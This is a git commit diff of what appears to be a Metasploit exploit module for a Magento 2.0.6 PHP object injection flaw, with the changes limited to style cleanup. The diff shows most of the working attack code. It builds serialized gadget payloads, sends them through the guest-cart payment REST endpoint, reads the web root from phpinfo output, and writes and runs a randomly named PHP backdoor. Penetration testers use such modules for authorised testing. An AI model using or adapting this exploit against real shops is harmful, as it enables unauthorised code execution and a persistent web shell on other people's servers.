Cosmetic changes for magento_unserialize to pass msftidy & guidelines

bug/bundler_fix
wchen-r7 2016-06-02 16:34:41 -05:00
parent 4f42cc8c08
commit 7c9227f70b
1 changed files with 56 additions and 38 deletions


@ -13,16 +13,18 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Magento <= 2.0.6 Unserialize Remote Code Execution', 'Name' => 'Magento 2.0.6 Unserialize Remote Code Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a PHP object injection vulnerability in Magento <= 2.0.6 This module exploits a PHP object injection vulnerability in Magento 2.0.6
or prior.
}, },
'Platform' => 'php', 'Platform' => 'php',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Author' =>
[
'Netanel Rubin', # original discovery 'Netanel Rubin', # original discovery
'agix', # original exploit 'agix', # original exploit
'mr_me <mr_me@offensive-security.com>', # metasploit module 'mr_me <mr_me[at]offensive-security.com>', # metasploit module
], ],
'Payload' => 'Payload' =>
{ {
@ -36,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/'] ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
], ],
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
'Targets' => [ 'Targets' =>
[
[ 'Automatic Targeting', { 'auto' => true } ], [ 'Automatic Targeting', { 'auto' => true } ],
], ],
'DisclosureDate' => 'May 17 2016', 'DisclosureDate' => 'May 17 2016',
@ -48,6 +51,10 @@ class MetasploitModule < Msf::Exploit::Remote
], self.class) ], self.class)
end end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def get_phpinfo def get_phpinfo
# uses the Magento_Framework_DB_Transaction class # uses the Magento_Framework_DB_Transaction class
serialize = 'O:13:\"Credis_Client\":22:{' serialize = 'O:13:\"Credis_Client\":22:{'
@ -149,7 +156,8 @@ class MetasploitModule < Msf::Exploit::Remote
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;' serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:11:\"\u0000*\u0000requests\";' serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 'i:0;}' serialize << 'i:0;}'
return serialize
serialize
end end
def get_phpshell def get_phpshell
@ -252,14 +260,16 @@ class MetasploitModule < Msf::Exploit::Remote
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;' serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:11:\"\u0000*\u0000requests\";' serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 'i:0;}' serialize << 'i:0;}'
return serialize
serialize
end end
def do_check def do_check
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"' data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data << get_phpinfo data << get_phpinfo
data << "\"}},\"email\":\"#{@email}\"}" data << "\"}},\"email\":\"#{@email}\"}"
return send_request_cgi({
send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"), 'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'ctype' => 'application/json', 'ctype' => 'application/json',
@ -293,16 +303,19 @@ class MetasploitModule < Msf::Exploit::Remote
end end
end end
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError => e
vprint_error(e.message)
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end end
def get_webroot def get_webroot
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"' data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data << get_phpinfo data << get_phpinfo
data << "\"}},\"email\":\"#{@email}\"}" data << "\"}},\"email\":\"#{@email}\"}"
# we steal path via phpinfo # we steal path via phpinfo
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -310,11 +323,13 @@ class MetasploitModule < Msf::Exploit::Remote
'ctype' => 'application/json', 'ctype' => 'application/json',
'data' => data, 'data' => data,
}) })
if res and res.code == 200
if res && res.code == 200
@webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/ @webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/
return true return true
end end
return false
false
end end
def create_fake_cart def create_fake_cart
@ -325,10 +340,10 @@ class MetasploitModule < Msf::Exploit::Remote
'cookie' => @cookies, 'cookie' => @cookies,
'vars_get' => { 'form_key' => @form_key } 'vars_get' => { 'form_key' => @form_key }
}) })
if (res and res.body.include?('[]'))
return true return true if (res && res.body.include?('[]'))
end
return false false
end end
def generate_cart_id def generate_cart_id
@ -337,27 +352,29 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, '/checkout/cart/'), 'uri' => normalize_uri(target_uri.path, '/checkout/cart/'),
'cookie' => @cookies, 'cookie' => @cookies,
}) })
if res and res.code == 200 if res && res.code == 200
@guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/ @guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/
return true return true
end end
return false
false
end end
def backdoor def backdoor
data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\"" data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\""
data << get_phpshell data << get_phpshell
data << "\"}},\"email\":\"#{@email}\"}" data << "\"}},\"email\":\"#{@email}\"}"
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"), 'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'ctype' => 'application/json', 'ctype' => 'application/json',
'data' => data, 'data' => data,
}) })
if (res && res.body.include?('true'))
return true return true if (res && res.body.include?('true'))
end
return false false
end end
def exec_code def exec_code
@ -366,21 +383,22 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"), 'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"),
}, timeout = 0.5) }, timeout = 0.5)
end end
def exploit def exploit
define_globals define_globals
@backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php" @backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php"
register_files_for_cleanup("#{@backdoor}") register_files_for_cleanup("#{@backdoor}")
if create_fake_cart && generate_cart_id if create_fake_cart && generate_cart_id
print_good("generated a guest cart id") print_good("generated a guest cart id")
if get_webroot if get_webroot && backdoor
if backdoor
print_good("backdoor done!") print_good("backdoor done!")
exec_code exec_code
end end
end end
end end
end
end end
=begin =begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc
[*] Processing scripts/sam.rc for ERB directives. [*] Processing scripts/sam.rc for ERB directives.